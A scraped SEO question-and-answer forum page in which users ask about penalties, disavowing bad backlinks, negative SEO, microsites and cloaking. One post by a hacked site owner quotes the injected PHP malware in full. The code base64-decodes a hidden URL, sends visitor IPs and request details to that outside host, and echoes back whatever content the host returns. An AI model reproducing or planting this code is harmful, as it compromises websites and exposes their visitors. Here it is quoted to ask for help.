Skip to content

Welcome to the Q&A Forum

Browse the forum for helpful insights and fresh discussions about all things SEO.

Category: White Hat / Black Hat SEO

Dig into white hat and black hat SEO trends.


  • Basically my webdeveloper has suggested that instead of using a subfolder to create an English and Korean version of the site I should create two different websites and then link them both together to provide the page in English, or in Korean, which ever the case may be. My immediate reaction is that search engines may perceive this kind of linking to be manipulative, as you can imagine there will be a lot of links (One for every page). Do you think it is OK to create two webpages and link them together page by page? Or do you think that the site will get penalized by search engines for link farming or link exchanging. Regards, Tom

    | CoGri
    0

  • Hi guys I was hoping someone could help me on a problem that has arisen on the site I look after. This is my first SEO job and I’ve had it about 6 months now. I think I’ve been doing the right things so far building quality links from reputable sites with good DA and working with bloggers to push our products as well as only signing up to directories in our niche. So our backlink profile is very specific with few spammy links. Over the last week however we have received a huge increase in backlinks which has almost doubled our linking domains total. I’ve checked the links out from webmaster tools and they are mainly directories or webstat websites like the ones below | siteinfo.org.uk deperu.com alestat.com domaintools.com detroitwebdirectory.com ukdata.com stuffgate.com | We’ve also just launched a new initiative where we will be producing totally new and good quality content 4-5 times a week and many of these new links are pointing to that page which looks very suspicious to me. Does this look like negative Seo to anyone? I’ve read a lot about the disavow tool and it seems people’s opinions are split on when to use it so I was wondering if anyone had any advice on whether to use it or not? It’s easy for me to identify what these new links are, yet some of them have decent DA so will they do any harm anyway? I’ve also checked the referring anchors on Ahrefs and now over 50% of my anchor term cloud are totally unrelated terms to my site and this has happened over the last week which also worries me. I haven’t seen any negative impact on rankings yet but if this carries on it will destroy my link profile. So would it be wise to disavow all these links as they come through or wait to see if they actually have an impact? It should be obvious to Google that there has been a huge spike in links so then the question is would they be ignored or will I be penalised. Any ideas? Thanks in advance Richard

    | Rich_995
    0

  • I have a domain lets say it's mydomain.com, which has my web app already hosted on this domain. I wanted to create a sub-product from my company, the concept is a bit different than my original web app that is on mydomain.com and I am planning to host this on mynewapp.mydomain.com. I am having doubts that using a sub-domain will have an impact on my existing or new web app. Can anyone give me any pointers on this? As much as I wanted to use a directory mydomain.com/mynewapp, this is not possible because it will just confuse existing users of the new product/web app. I've heard that subdomains are essentially treated as a new site, is this true? If it is then I am fine with this, but is it also true that subdomains are harder to reach the top rank rather than a root domain?

    | herlamba
    0

  • Hello dear MoZ community, I have already communicated this problem before but now it reaches to a level I have to make some hard decisions and would like your help. One of our new accounts (1 month old) got a manual penalty notification few weeks ago from Google for unnatural link building. I went through the whole process, did link detox and analysis and indeed there were lots of blog networks existing purely for cross linking. I removed these and the links got decreased dramatically. The company had around 250,000 links and truth be told if I go by the book only 700-800 of them are really worth and provide value. They will end up with roughly 15000 -20000 left which I acknowledge are a lot but some are coming from web 2 properties such as blogger, wordpress etc. Because the penalty was in some of the pages and not the whole web site I removed the ones that I identified were harming the web site, brought the anchor text down to normal levels and filed a very detailed reconsideration request and disavow file. I do not have a response so far by webmasters but here is where my concerns begin: Should I go for a new domain? losing 230.000 links ? How can there even be a "reconsideration" request for a web site with 85% of its link profile being cross linking to self owned directories and web 2 properties? If I go for a new domain should I redirect? Should I keep the domain, keep cleaning and adding new quality links so I take it with a fresh new approach? Thanks everyone in advance!

    | artdivision
    0

  • Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question :  Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard

    | GTGshops
    0

  • Hi All, On the site www.myworkwear.co.uk we have a an externally hosted site search that also creates separately hosted pages of popular searches which rank in Google and create traffic. An example of this is listed below: Google Search:  blue work trousers (appears on front page of Google) Site Champion Page: http://workwear.myworkwear.co.uk/workwear/Navy%20Blue%20Work%20Trousers Nearest Category page: http://www.myworkwear.co.uk/category/Mens-Work-Trousers-936.htm Could this be a penalisation or duplication factor? Could these be interpreted as a dodgy link factor? Thanks in advance for your help. Kind Regards, Andy Southall

    | MarzVentures
    0

  • Hi all After watching our ranking for some primary keywords drop on Google from page 1 to 20 and then totally off the charts in relatively short period I've recently discovered through moz tools that our website along with other competitor sites are victims to black linking (may have the terminology wrong). Two primary words are anchor linked to our domain (www.solargain.com.au) being sex & b$tch through over 4000 compromised sites - mostly Wordpress - many which are high profile sites. Searching through the source code through half a dozen compromised sites I noticed that competitors are also linked using other derogatory terms, but the patterns indicate batch or clustered processing. The hacker has left some evidence as to whom they are representing as I can see some credible discussion forums which contain negative feedback on one particular supplier also among the links. Although this is pretty good evidence to why our ranking has dropped there are some interesting questions: A) is there any way to rectify the 4000 or so black links, mass removal or other. (Doesn't sound feasible)
    B) some competitors who dominate organic ranking through better optimization don't seem to be affected or apparently affected as much as our site at least. Which questions how much we are affected as a direct result from this hack.
    C) is there action or support for industrial espionage?
    D) can you request from google to ignore the inbound links and would they not have a duty of care to do so? I'm fairly new to this ugly side of the Internet and would like to know how to approach recovery and moving forward. Thoughts ideas very welcome. Thanks in advance.

    | mannydog
    0

  • We disavowed 80% of our backlink profile due to our last SEO building cheap nasty links and filed a reconsideration requested (we had the Google Webmaster Tools notice of detected unnatural links to http://www.xxx.co.uk  penalty for a year from the 24<sup>th</sup> march 2012 but thought it best to clean up before round 2 – even though we had no real penalty and we dd some decent link building that moved us up). We then received a successful penalty lifted note (on the 22<sup>nd</sup> of May 2013) but our rankings dropped (due to the crap links propping us up) since then we have built a fair few high quality links but our rankings do not seem to be moving much if at all (7 weeks clear now). has anyone had any experience with the above (are we in a sandbox type situation). Thank you for your time Thanks Bob

    | BobAnderson
    0

  • Howdy Moz, Over and over we hear of folks using microsites in addition to their main brand for targeting keyword specific niches.  The main point of concern most folks have is either in duplicate content or being penalized by Google, which is also our concern.  However, in one of our niches we notice a lot of competitors have set up secondary websites to rank in addition to the main website (basically take up more room on the SERPS).  They are currently utilizing different domains, on different IPs, on different servers, etc.  We verified because we called and they all rang to the same competitors. So our thought was why not take the fight to them (so to speak) but with a branding and content strategy.  The company has many good content pieces that we can utilize, like company mottos, missions statements, special projects, community outreach that can be turned into microsites with unique content. Our strategy idea is the take a company called "ACME Plumbing" and brand for specific keywords with locations like sacramentoplumberwarranty.com where the site's content revolves around plumber warranty info, measures of a good warranty, plumbing warranty news (newsworthy issues), blogs, RCS - you get the idea...and send both referral traffic and link to the main site. The ideal is to then repeat the process with another company aspect like napaplumbingprojects.com where the content of the site is focused on cool projects, images, RCS, etc. Again, referring traffic and link juice to the main site. We realize that this adds the amount of RCS that needs to be done, but that's exactly why we're here.  Also, any thoughts of intentionally tying in the brand to the location so you get urls like acmeplumbingsacarmento.com?

    | AaronHenry
    1

  • Hi, We are considering using separate servers for when a Bot vs. a Human lands on our site to prevent overloading our servers. Just wondering if this is considered cloaking if the content remains exactly the same to both the Bot & Human, but on different servers. And if this isn't considered cloaking, will this affect the way our site is crawled? Or hurt rankings? Thanks

    | Desiree-CP
    0

  • As a web developer, it's not uncommon for me to place a link in the footer of a website to give myself credit for the web design/development. I recently decided to go back and nofollow all these site-wide footer links, to avoid potentially looking spammy. I wanted to know if I should remove these links altogether, and just give myself text credit without a link at all?  I would like for a potential client who is interested in my work to still be able to get to my site if they like my work - but I want to keep my link profile squeaky clean. Thoughts?

    | brad.s.knutson
    0

  • As title, anyone used them?  their reviews all sound really positive (if they're real).  The system sounds like an auto submitting back link generator - which can't be good?

    | FDFPres
    0

  • We are a small company competing for traffic in an industry with more or less one other very large brand. I'm noticing we are getting a descent amount of organic traffic for the competitor's brand name however I haven't done any on-page inclusion or link building for the term. We are using their brand as a keyword in our paid campaigns and seeing potential. I firmly believe we have a superior product. I'm tempted to start going after our competitor's brand as a keyword to skim some of their traffic. My question is how far it too far? Do I actively try to obtain a few anchor text specific backlinks? Dare I use their brand name as a term on our page? Maybe just a simple blog post comparing our two products is more appropriate? Any suggestions are appreciated.

    | CaliB
    0

  • A client currently has a domain of johnsmith.com (not actual site name, of course). I’m considering splitting this site into multiple domains, which will include brand name plus keyword, such as: Johnsmithlandclearing.com Johnsmithdirtwork.com Johnsmithdemolition.com Johnsmithtimercompany.com Johnsmithhydroseeding.com johnsmithtreeservice.com Each business is unique enough and will cross-link to the other. My questions are: 1) will Google consider cross-linking spammy? 2) what happens to johnsmith.com? Should it redirect to new site with the largest market share, or should it become an umbrella for all? 3) Any pitfalls foreseen? I've done a fair amount of due diligence and feel these separate domains are legit, but am paranoid that Google will not see it that way, or may change direction in the future.

    | SteveMauldin
    0

  • Prior to the most recent Google update, we noticed our microsites were indexing very well.  The intent of these microsites was not to build link popularity for the primary sites, but simply to show up as additional results within search. However, with the most recent Google update, we see the microsites are not indexing very well.  And given the suggestion from Google that microsites should be avoided -- with the potential that the primary site be penalized if they are not -- it appears those microsites should be pulled down. But on Bing/Yahoo, these microsites are still indexed -- and indexed very well. So this begs the question: are microsites worthwhile?  Do we think Bing/Yahoo will follow suit?  Is it beneficial to perhaps tell Googlebot to ignore the microsites while allowing Bing & Yahoo to index them?  Looking for some thoughts here...

    | AltMediaStudios
    0

  • So I have a site that currently has a partial match penalty from google, I have been working to get it removed...Bad SEO basically my site was submitted to a bunch of bad blog networks..Hopefully it gets lifted soon as we remove and disavow links. That said I was planning on moving a portion of my site to a new site since its not really the focus of the site anymore however still pays the bills. I have also have been building it more of a network of sites..So If I do that and 301 redirect the pages I moved, will the penalty carry? On the current site I planned on using Rel no follow to any links that I may change in the header/menus etc.. Some of these pages I believe have the penalty while others dont. I really just dont want to screw anything else up more then it is? My biggest fear is that its perceived as a blackhat method or something like that? Any thoughts?

    | dueces
    0

  • Hi I have heard that penguin penalizes a site for bad backlinks. Do you think that it is true? Do you think that is possible for someone to penalize my website adding my link to some spam website? I'm worried that someone could do it...

    | darkanweb
    0

  • I recently noticed a large number of backlinks from low authority directories coming in for one of my clients. These links were either purchased from a competitor or from a directory service site that knows we might be willing to pay to have bad links removed. I've contacted the website admin and they require a payment of $.30 per link to have them removed from their directory. Has anyone had a similar experience? I'm also considering using the disavow tool but I've heard the outcome of using this tool is usually bad. I'd appreciate any feedback, thanks!

    | Leadhub
    1

  • I am giving a presentation in a few weeks and looking for a "what not to do" larger brand example that made poor SEO choices to try and game Google with black hat tactics. Any examples you can point me to?

    | jfeitlinger
    0

  • Hi there, I recently checked the back links for my site using Open Site Explorer, and I noticed a huge number of bad back links which I believe a competitor might be building to help lower my ranking for a number of highly competitive keywords. Besides spending time disavowing these links, what else can be done? Has anyone else been faced with the same problem? Any help would be appreciated. cXT0lvd.jpg

    | bamcreative
    0

  • Hello Everybody,I've been working as an inhouse SEO for nearly a year and a half now and i've gotten some pretty great results. Two years ago our site was on the second page for the most important keywords in our niche and with a lot of work we've managed to get top 5 rankings for most keywords and even the number 1 spot for the most important keywords. I've been using opensite explorer to track backlinks and today i noticed that a lot of links we're discovered in the last week from websites that i did not recognize. Most url's won't even load properly because each "blogpost" has over a thousand comments. It took me a couple of tries to even find one that loaded properly and find the link to our website, and it was really there. There haven't been any drops in our rankings but i'm worried about a possible spam penalty. I know that i can use the disavow tool to at least disavow the links from these domains, but is that really the only thing i can do? Furthermore these are just the links that opensiteexplorer picked up, who knows how many more are out there.For any of you questioning wether or not i did this to myself, I'm no saint, but I'm definitely not stupid enough to buy these kinds of links. any help would be highly appreciated

    | Laurensvda
    0

  • So I have a theory that Google "grandfathers" in a handful of old websites from every niche and that no matter what the site does, it will always get the authority to rank high for the relevant keywords in the niche. I have a website in the crafts/cards/printables niche. One of my competitors is http://printable-cards.gotfreecards.com/ This site ranks for everything... http://www.semrush.com/info/gotfreecards.com+(by+organic) Yet, when I go to visit their site, I notice duplicate content all over the place (extremely thin content, if anything at all for some pages that rank for highly searched keywords), I see paginated pages that should be getting noindexed, bad URL structure and I see an overall unfriendly user experience. Also, the backlink profile isn't very impressive, as most of the good links are coming from their other site, www.got-free-ecards.com. Can someone tell me why this site is ranking for what it is other than the fact that it's around 5 years old and potentially has some type of preference from Google?

    | WebServiceConsulting.com
    0

  • I am looking to go after sites that are, and will never be, affected by Penguin/Panda updates.  Is there a tool or a general rule of thumb on how to avoid such sites?  Is there a method anyone is currently using to get good natural links post Penguin 2.0?

    | dsinger
    0

  • Does anyone know more information about this directory? Is it a good quality directory that I should pay to get listed on?

    | EcomLkwd
    0

  • We picked up a client who before ourselves was just using link building as their SEO strategy. They came to us for on page SEO and overall guidance.  We have done some targeted link building and did some work with their link building company to remove some links, however after doing some further diggings Im wondering if we still have some bad links? My reasoning for this is:- all the SEO work we have done on the pages are getting A reports in Moz (which is our back up check) the RD and PA for many of the pages we have focused on are higher RDs and PA's than the pages that rank on the first page Any suggestions?

    | SocialB
    1

  • Hi, I found a lot of information about responsive design and SEO, mostly theories no real experiment and I'd like to find a clear answer if someone tested that. Google says: 
    Sites that use responsive web design, i.e. sites that serve all devices on the same set of URLs, with each URL serving the same HTML to all devices and using just CSS to change how the page is rendered on the device
    https://developers.google.com/webmasters/smartphone-sites/details For usability reasons sometimes you need to hide content or links completely (not accessible at all by the visitor) on your page for small resolutions (mobile) using CSS ("visibility:hidden" or "display:none") Is this counted as hidden content and could penalize your site or not? What do you guys do when you create responsive design websites? Thanks! GaB

    | NurunMTL
    0

  • Here is the email my sales rep received today (what can we do to combat this?): From: Jaqueline carol [mailto:[email protected]]
    Sent: Wednesday, September 11, 2013 12:57 AM
    To:
    Subject: I NEED your help - PLEASE Hi, Due to the latest GoogIe update we are working on cleaning up the links to our website . There fore we would like to kindly ask you to remove our link from your page. link details: URL: We believe that it would help both sides to rank up higher in Google and not get penalized during the future Google updates.
    Please remove my link at the earliest and notify me about the same. Thank you for your cooperation. Best Regards, Jaquelinecarol

    | pbhatt
    1

  • We have a few charity events coming up that have offered to link back to our homepage. While we do genuinely like the charities we are going to sponsor, I'm not sure how those links will look seo-wise. For example, one is for the local high school basketball team and another is for a Pediatric Care Mud Run. To a human, these links make perfect sense, but to a robot, I'm not sure if it differentiates these links from spam/some negative link. Granted, I understand that a small percentage of links probably won't do anything either way, but I'd like to ignore that for the purposes of my question. All things being equal, do links such as these help or hurt? Thanks for your time and insight, Ruben

    | KempRugeLawGroup
    0

  • Hello all, So I have a website that was hit hard by Panda back in 2012 November, and ever since the traffic continues to die week by week. The site doesnt have any major moz errors (aside from too many on page links). The site has about 2,700 articles and the text to html ratio is about 14.38%, so clearly we need more text in our articles and we need to relax a little on the number of pictures/links we add. We have increased the text to html ratio for all of our new articles that we put out, but I was wondering how beneficial it is to go back and add more text content to the 2,700 old articles that we have just sitting. Would this really be worth the time and investment? Could this help the drastic decline in traffic and maybe even help it grow?

    | WebServiceConsulting.com
    0

  • It seems like the more I learn about my competition's links, the less I understand about the penalties associated with paid links. Martindale-hubbard (in my industry) basically sells links to every lawyer out there, but none of the websites with those links are penalized. I'm sure you all have services like that in your various industries. Granted, Martindale-hubbard is involved in the legal community and it's tied to Lexis Nexis, but any small amount of research would tell you that paid links are a part of their service. Why does this company (and companies that use them) not get penalized? Did the penguin update just go after companies that got links from really seedy, foreign companies with gambling/porn/medication link profiles? I keep reading on this forum and other places that paid links are bad, but it looks to me like there are fundamental differences in the penalties for paid links purchased from one company vs another. Is that the case or am I missing something? Thanks, Ruben

    | KempRugeLawGroup
    0

  • Hello, My website, www.coloringbookfun.com is very old and authoritative, but the URL structure is terrible. If you check out some of our subcategories such as http://www.coloringbookfun.com/Kung Fu Panda and individual printables such as http://www.coloringbookfun.com/Kung Fu Panda/imagepages/image2.html You can see that they aren't optimized. I am curious to know the pros and cons of fixing the URL structure and 301ing them to the new optimized url. Will 301ing lose authority and backlinks for the sites pages? Does optimizing the url structure outweigh losing the authority/backlinks?

    | WebServiceConsulting.com
    0

  • We had the PayDay hack - and solved it completely. The problem is - the SERPs have over 3,000 URLs pointing to 404 on our website all of which have urls that are like this: <cite>www.onssi.com/2012/2/post1639/payday-loan-companies-us</cite>‎ What should I do? Should I disavow every one of the 3,000? No Follow?

    | Ocularis
    0

  • It's generally not too hard to rank in Google Places and organically for your primary location.  However if you are a service area business looking to rank for neighboring cities or service areas, Google makes this much tougher. Andrew Shotland mentions the obvious and not so obvious options: Service Area pages ranking organically, getting a real/virtual address, boost geo signals, and using zip codes instead of service area circle. But I am wondering if anyone had success with other methods? Maybe you have used geo-tagging in a creative way? This is a hurdle that many local business are struggling with and any experience or thoughts will be much appreciated

    | vmialik
    1

  • Hi, When you search for "business plan software" on google.co.uk, 7 of the 11 first results are results from 1 company selling 2 products, see below: #1. Government site (related to "business plan" but not to "business plan software")
    #2. Product 1 from Palo Alto Software (livePlan)
    #3. bplan.co.uk: content site of Palo Alto Software (relevant to "business plan" but only relevant to "business plan software" because it is featuring and linking to their Product 1 and Product 2 sites)
    #4. Same site as #3 but different url
    #5. Palo Alto Software Product 2 (Business Plan Pro) page on Palo Alto Software .co.uk corporate site
    #6. Same result as #5 but different url (the features page)
    #7. Palo Alto Software Product 2 (Business Plan Pro) local site
    #8, #9 and #10 are ok
    #11. Same as #3 but the .com version instead of the .co.uk This seems wrong to me as it creates an illusion of choice for the customer (especially because they use different sites) whereas in reality the results are showcasing only 2 products. Only 1 of Palo Alto Software's competitors is present on page 1 of the search results (the rest of them are on page 2 and page 3). Did some of you experience a similar issue in a different sector? What would be the best way to point it out to Google? Thanks in advance Guillaume

    | tbps
    0

  • Hey, we are redesigning the site and we are changing a lot of urls to make them more SEO friendly But some of the old urls have PR 4-5 What is the best way to do about this? How to do a 301 redirect for specific pages in asp.net Or do you recommend something elsE? Thanks in advance

    | Madz
    0

  • If you have massive pages with super thin content (such as pagination pages) and you noindex them, once they are removed from googles index (and if these pages aren't viewable to the user and/or don't get any traffic) is it smart to completely remove them (404?) or is there any valid reason that they should be kept? If you noindex them, should you keep all URLs in the sitemap so that google will recrawl and notice the noindex tag? If you noindex them, and then remove the sitemap, can Google still recrawl and recognize the noindex tag on their own?

    | WebServiceConsulting.com
    0

  • I have a question I hope people can help me on.  it is my intention for my next project to focus on domain authority, and a small number of high quality links.  I have a couple of scenarios I would appreciate some advice on: 1.  Can lower quality links lower domain authority? 2.  Would you avoid links from low quality sites no matter what \ what domain authority levels should you avoid links from. 3.  Should I be looking at link profiles of the sites I get links from.  Does it matter if a site I get a link from has 1000's of spammy links (i.e. something to look out for when doing guest blogging). 4.  Should I avoid directories no matter what, or is high pr \ domain authority directories ok to use, if I end up on a page of other relevant directory submissions related to my niche. Essentially, my aim is to have high quality links, but equally, there are some decent sites on the fringes that I will need to consider (based on a competitors link profile I researches).

    | Jonathan1979
    0

  • The site is https://virtualaccountant.ie/ It's a really small site They have only about 7 back links, They don't blog They don't have a PPC campaign They don't stand out from the crowd in terms of product or services offered So why are they succeeding in topping the SERP's for difficult to rank for accounting keywords such as accountant and online accounts. What are they doing better than everyone else, or have they discovered a way to cheat Google, and worse still - ME!

    | PeterConnor
    0

  • I can't imagine this is a White Hat SEO technique, but they don't seem to be punished for it by Google - yet. How does Google treat the use of your competitors names in your meta keywords/descriptions? Is it a good idea?

    | PeterConnor
    0

  • I have neglected to add alt tags to one of my sites, and am ready to tackle the project. I want to make sure I do not do something that will have a negative impact on rankings....and I have not been able to find info that fits my situation. The pics are all about a product I make and sell through the site. I have a free gallery section that has about 10 galleries with about 20 pics each. Each gallery page has a different model and/or context of how the product. might be used. These are not sales pages directly just thumbnail galleries linked to larger images for the viewers enjoyment. I have 10 or so keyword phrases that would be good to use, with the intent to start getting listed in google images and other rank enhancements. Can I choose one keyword phrase as my alt tag choice  for a whole gallery and give each individual large pic in the gallery that same alt tag, And use a different phrase for the next gallery's pics etc.? Or is that thought of as stuffing, and I would have to come up with a different keyword phrase for each pic? I hope that makes sense. Thanks Galen

    | Tetruss
    0

  • Hi there, through Open Site Explorer I've found 5838 links (across 1458 domains) with the anchor text 'new porn' pointing to a site I manage. Someone's been busy! Most (99.5%) appear to be created as Pingbacks with rel="nofollow" on them. As a precaution I submitted a file through the Google Disavow tool which has had the status "You successfully uploaded a disavow links file" for the last month. I'm wondering whether I should be concerned, or whether Google and other search engines will be clever enough to know this site is about electricity and not scantily clad people?

    | originenergy
    0

  • My question is about how to syndicate content correctly.  Our site has professionally written content aimed toward our readers, not search engines.  As a result, we have other related websites who are looking to syndicate our content.  I have read the Google duplicate content guidelines (https://support.google.com/webmasters/answer/66359?hl=en), canonical recommendations (https://support.google.com/webmasters/answer/139066?hl=en&ref_topic=2371375), and no index recommendation (https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag) offered by Google, but am still a little confused about how to proceed. The pros in our opinion are as follows:#1 We can gain exposure to a new audience as well as help grow our brand #2 We figure its also a good way to help build up credible links and help our rankings in GoogleOur initial reaction is to have them use a "canonical link" to assign the content back to us, but also implement a "no index, follow" tag to help avoid duplicate content issues.  Are we doing this correctly, or are we potentially in threat of violating some sort of Google Quality Guideline?Thanks!

    | Dirving4Success
    0

  • Hi All, I'll premise this by saying that we like to engage in as much white hat SEO as possible. I'm certainly not asking for any shady advice, but we have a lot of local pages to optimize :). So, we are an IT and management training course provider. We have 34 locations across the US and each of our 34 locations offers the same courses. Each of our locations has its own page on our website. However, in order to really hone the local SEO game by course topic area and city, we are creating dynamic custom pages that list our course offerings/dates for each individual topic and city. Right now, our pages are dynamic and being crawled and ranking well within Google. We conducted a very small scale test on this in our Washington Dc and New York areas with our SharePoint course offerings and it was a great success. We are ranking well on "sharepoint training in new york/dc" etc for two custom pages. So, with 34 locations across the states and 21 course topic areas, that's well over 700 pages of content to maintain - A LOT more than just the two we tested. Our engineers have offered to create a standard title tag, meta description, h1, h2, etc, but with some varying components. This is from our engineer specifically: "Regarding pages with the specific topic areas, do you have a specific format for the Meta Description and the Custom Paragraph? Since these are dynamic pages, it would work better and be a lot easier to maintain if we could standardize a format that all the pages would use for the Meta and Paragraph. For example, if we made the Paragraph: “Our [Topic Area] training is easy to find in the [City, State] area.” As a note, other content such as directions and course dates will always vary from city to city so content won't be the same everywhere, just slightly the same. It works better this way because HTFU is actually a single page, and we are just passing the venue code to the page to dynamically build the page based on that venue code. So they aren’t technically individual pages, although they seem like that on the web. If we don’t standardize the text, then someone will have to maintain custom text for all active venue codes for all cities for all topics. So you could be talking about over a thousand records to maintain depending on what you want customized. Another option is to have several standardized paragraphs, such as: “Our [Topic Area] training is easy to find in the [City, State] area. Followed by other content specific to the location
    “Find your [Topic Area] training course in [City, State] with ease.” Followed by other content specific to the location Then we could randomize what is displayed. The key is to have a standardized format so additional work doesn’t have to be done to maintain custom formats/text for individual pages. So, mozzers, my question to you all is, can we standardize with slight variations specific to that location and topic area w/o getting getting dinged for spam or duplicate content. Often times I ask myself "if Matt Cutts was standing here, would he approve?" For this, I am leaning towards "yes," but I always need a gut check. Sorry for the long message. Hopefully someone can help. Thank you! Pedram

    | CSawatzky
    1

  • Hi all, This is now popping up in Moz after using this for over 6 months.
    It is saying this is now duplicate site content. What do we think? Is this a bad strategy, it works well on the SERPS but could be damaging the root domain page ranking? I guess this is a little shady. http://www.tomlondonmagic.com/area/close-up-magician-in-crowborough/ http://www.tomlondonmagic.com/area/close-up-magician-in-desborough/ http://www.tomlondonmagic.com/area/close-up-magician-in-didcot/ Thanks.

    | TomLondon
    0

  • Hi guys :). I am asking your help - basically I would like to know what would be the best way to set all of this up. Basically I have two main (e-commerce) sites, and a few other big web properties. What I would like to know is if it is ok to link the main sites to my real G+ account, and use alias G+ accounts for other web properties, or is that a kind of spamming? The thing is that I use a G+ account for those e-commerce sites, and would not necessarily want the other web properties to be linked to the same G+ account, as they are not really related. I do hope I was clear. Any insight would be appreciated. Thanks.

    | sumare
    0

  • This related to a previous question I had about satellite sites. I questioned the white-hativity of their strategy. Basically to increase the number of linking C blocks they created 100+ websites on different C blocks that link back to our main domain. The issue I see is that- the sites are 98% exactly the same in appearance and content. Only small paragraph is different on the homepage. the sites only have outbound links to our main domain, no in-bound links Is this a legit? I am not an SEO expert, but have receive awesome advice here. So thank you in advance!

    | Buddys
    0

  • We launched a redesign at the end of May and soon after, our website was de-indexed from Google. Here are the changes that I implemented so far to try to fix this issue: 301 redirect chain - We changed all our URLs and implemented 301 redirects. However, these are multiple redirects meaning 1 URL redirects to a second and then a 3rd. I was told that this could confuse Google. For example: http://cncahealth.com 301s to http://www.cncahealth.com 301s to https://www.cncahealth.com We wrote a rule for each variation of the URL and not there is only a one to one 301 redirect and this was validated with urivalet.com. Canonical tags did not match URL - We created the new website in a CMS where the CMS generated non-SEO friendly URLs. We applied 301 redirects to those CMS URLs, but when we enable canonical tags within the CMS, it uses the original CMS URL and not the URL of the page, so the canonical URL doesn't match the page. For now, I disabled canonical tags until I can figure out a way to manually insert canonical tag code in the pages without using the CMS canonical tag feature. After doing these two fixes our website still doesn't seem like it is able to get re-indexed by Google even when I submit the sitemap in Google Webmaster Tools...the sitemap doesn't get indexed? Questions...there are two more concerns that I am hoping can be answered in this community: Cache-Control = private : I saw from URIvalet.com that our cache-control is set to private. Is this affecting us being indexed and should this be set to public? Load Balancer - Our old website was not on a load balancer, but our new website is. When I look in our analytics at servers, I notice that the site is being picked up on one server and then another server at different times. Is Google seeing the same thing and is the load balancer confusing Google? I'm not sure what else could be an issue with us not being indexed. Maybe its just a waiting game where after I implemented the 1 & 2 change I just have to wait or does 3 & 4 or other issues also need to be addressed in order to get re-indexed? I hope someone can help me. Thanks!

    | rexjoec
    0

  • Our SEO provider created a bunch of "unique url" websites that have direct match domain names. The content is pretty much the same for over 130 websites (city name is different) that link directly to our main site. For me this was a huge red flag, but when I questioned them and they said it was fine. We haven't seen a drop in traffic, but concerned that Google just hasn't gotten to us. DA for each of these sites are 1 after several months. Should we be worried? I think yes, but I am an SEO newbie.

    | Buddys
    0

  • Hello, We are soon going to upgrade the cms to latest version along with new functionlaities - the process may take anywhere from 4 week to 6 weeks. may suggest - we need to work on live server, what we have planned take exact replica of site and move to a test domain, but on live server Block Google, Bing, Yahoo - User-agent: Google Disallow: /   , User-agent: Bing Disallow: /  User-agent: Yahoo Disallow: / in robots.txt Will upgrade CMS and add functionality - will test the entire structure, check url using screaming frog or xenu and move on to configure the site on original domain The process upgradation and new tools may take 1 - 1.5 month.... Concern is that despite blocking Google, Bing & Yahoo through User agent disallow - can still the url can be crawled by the search engines - if yes - it may hurt the original site as will read on as entire duplicate or is there any alternate way around.. Many thanks

    | Modi
    1

  • I have one online store and all the seo rules are follow to increase ranking and sales. Buying a new url a launching a new store ( to sale exactly the same products) is fast, easy and cheap. How about using black hat to this new store? I think I have nothing to loose. Is there something I should know before moving ahead? Launching a new store is very cheap and black hat can be done by one of those overseas company at low prices First thing, this new store should not link to my actual store I guess. Any advice? Thank you, BigBlaze

    | BigBlaze205
    0

Got a burning SEO question?

Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.


Start my free trial


Looks like your connection to Moz was lost, please wait while we try to reconnect.